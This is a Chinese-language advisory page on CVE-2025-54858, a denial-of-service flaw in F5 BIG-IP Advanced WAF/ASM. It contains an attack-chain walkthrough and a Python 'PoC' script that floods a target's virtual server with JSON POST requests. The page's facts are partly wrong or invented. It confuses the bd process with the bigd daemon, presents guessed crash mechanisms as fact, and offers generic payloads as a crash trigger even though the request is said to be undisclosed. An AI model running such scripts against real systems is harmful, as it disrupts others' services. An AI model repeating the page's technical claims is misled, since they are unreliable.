CVE-2025-54858 F5 BIG-IP JSON内容配置畸形导致拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-54858

漏洞类型

拒绝服务（DoS）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP Advanced WAF / BIG-IP ASM

漏洞概述

CVE-2025-54858是F5 BIG-IP Advanced WAF（Web应用防火墙）和BIG-IP ASM（应用安全管理器）产品中的一个高危拒绝服务漏洞。该漏洞的CVSS评分为7.5，属于高危级别。当BIG-IP Advanced WAF或BIG-IP ASM安全策略配置了含有畸形JSON模式（malformed JSON schema）的JSON内容配置文件（JSON content profile），并且该安全策略被应用于虚拟服务器（virtual server）时，攻击者可以通过发送未公开的特定请求，导致bd进程（bigd守护进程，负责流量管理和健康监控）异常终止。由于bd进程负责处理关键的流量管理和负载均衡功能，该进程的终止将导致BIG-IP设备对相关虚拟服务器上的流量处理能力丧失，从而造成服务不可用。该漏洞无需认证即可利用，且不需要用户交互，攻击者只需通过网络即可远程触发，对系统的可用性造成严重影响。值得注意的是，已经达到技术支持终止（End of Technical Support, EoTS）的软件版本不在F5的评估范围内，因此使用旧版本的用户应特别关注自身系统的安全性。F5公司已发布安全公告K000156621，建议用户尽快升级到修复版本以消除此漏洞带来的风险。

技术细节

该漏洞的核心问题在于BIG-IP Advanced WAF/ASM在处理JSON内容配置文件时，对JSON模式的解析存在缺陷。当管理员配置安全策略时，如果JSON内容配置文件中包含畸形（malformed）的JSON模式定义，系统在加载该配置时可能不会立即报错，但会在处理符合特定条件的请求时触发底层解析逻辑的异常。具体而言，当畸形JSON模式被加载到内存中后，bd进程在执行请求检测时会尝试根据预定义的JSON模式验证请求体中的JSON数据结构。由于模式本身存在格式或逻辑错误，验证过程中可能出现空指针引用、缓冲区越界访问或断言失败等异常情况，导致bd进程崩溃退出。攻击者无需了解畸形模式的具体内容，只需发送能够触发JSON模式验证流程的特定HTTP请求即可利用此漏洞。由于漏洞利用不需要认证（PR:N）且无需用户交互（UI:N），攻击者可以通过自动化工具扫描暴露在公网的BIG-IP设备并发起攻击。该漏洞的攻击向量为网络（AV:N），攻击复杂度低（AC:L），主要影响系统的可用性（A:H），对机密性（C:N）和完整性（I:N）无直接影响。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过扫描互联网或内网，识别暴露的F5 BIG-IP Advanced WAF/ASM设备的虚拟服务器端口（通常为443/HTTPS），确认目标BIG-IP设备配置了包含JSON内容配置文件的安全策略。

STEP 2

步骤2：探测JSON内容配置

攻击者向目标虚拟服务器发送带有Content-Type: application/json的HTTP请求，探测目标是否启用了JSON内容配置文件以及关联的JSON模式验证功能。

STEP 3

步骤3：构造触发请求

攻击者构造能够触发畸形JSON模式验证流程的特定HTTP请求（如包含特定嵌套结构、异常数据类型或特殊编码的JSON载荷），这些请求在正常JSON模式下不会导致问题，但在畸形模式下会触发bd进程的解析异常。

STEP 4

步骤4：发送恶意请求

攻击者通过自动化工具批量发送构造的恶意HTTP请求到目标虚拟服务器。由于漏洞无需认证且无需用户交互，攻击者可以持续发送请求直到bd进程被终止。

STEP 5

步骤5：服务中断

bd进程在处理畸形JSON模式验证时崩溃终止，导致BIG-IP设备无法继续处理该虚拟服务器上的流量，合法用户的请求被拒绝，造成拒绝服务攻击效果。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-54858 PoC - F5 BIG-IP JSON Content Profile DoS
# This PoC demonstrates triggering the bd process crash via malformed JSON schema
# Note: Requires a BIG-IP device with Advanced WAF/ASM configured with
# a JSON content profile containing a malformed JSON schema

import requests
import json
import sys

target_host = "https://target-bigip.example.com"
virtual_server_path = "/"  # Path protected by the vulnerable virtual server

def trigger_crash():
    """
    Send crafted HTTP requests that trigger JSON schema validation
    in the bd process, causing it to terminate.
    """
    # Attempt 1: Send request with JSON content-type to trigger schema validation
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-54858)"
    }
    
    # Crafted JSON payload designed to trigger malformed schema validation
    payloads = [
        # Deeply nested JSON to trigger schema validation edge cases
        json.dumps({"a": {"b": {"c": {"d": {"e": {"f": "test"}}}}}}),
        # JSON with unexpected types
        json.dumps({"data": [1, 2, {"nested": [True, None, "string"]}]}),
        # Large JSON object
        json.dumps({f"key_{i}": f"value_{i}" for i in range(100)}),
    ]
    
    for i, payload in enumerate(payloads):
        try:
            print(f"[*] Sending payload {i+1}/{len(payloads)}...")
            response = requests.post(
                f"{target_host}{virtual_server_path}",
                headers=headers,
                data=payload,
                timeout=10,
                verify=False
            )
            print(f"[*] Response status: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed (possible crash): {e}")
            return True
    
    return False

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-54858 - F5 BIG-IP JSON Content Profile DoS PoC")
    print("=" * 60)
    print(f"[*] Target: {target_host}")
    print(f"[*] Path: {virtual_server_path}")
    print()
    
    if trigger_crash():
        print("[+] bd process may have been terminated!")
        sys.exit(0)
    else:
        print("[-] No crash detected. Target may not be vulnerable.")
        sys.exit(1)

影响范围

F5 BIG-IP Advanced WAF（具体版本需参考F5官方公告K000156621）

F5 BIG-IP ASM（具体版本需参考F5官方公告K000156621）

防御指南

临时缓解措施

在升级到修复版本之前，建议采取以下临时缓解措施：1）审查所有虚拟服务器关联的JSON内容配置文件，检查并修正其中可能存在的畸形JSON模式定义；2）对于不需要JSON内容验证的虚拟服务器，暂时禁用JSON内容配置文件功能；3）在BIG-IP设备前部署WAF或IPS，对发往虚拟服务器的JSON请求进行预过滤；4）配置bd进程监控和自动重启脚本，确保进程崩溃后能尽快恢复服务；5）通过网络ACL限制对BIG-IP设备的访问范围，减少暴露面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-54858
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-54858
3 Details https://www.cvedetails.com/cve/CVE-2025-54858/
4 VulDB https://vuldb.com/cve/CVE-2025-54858
5 Link https://my.f5.com/manage/s/article/K000156621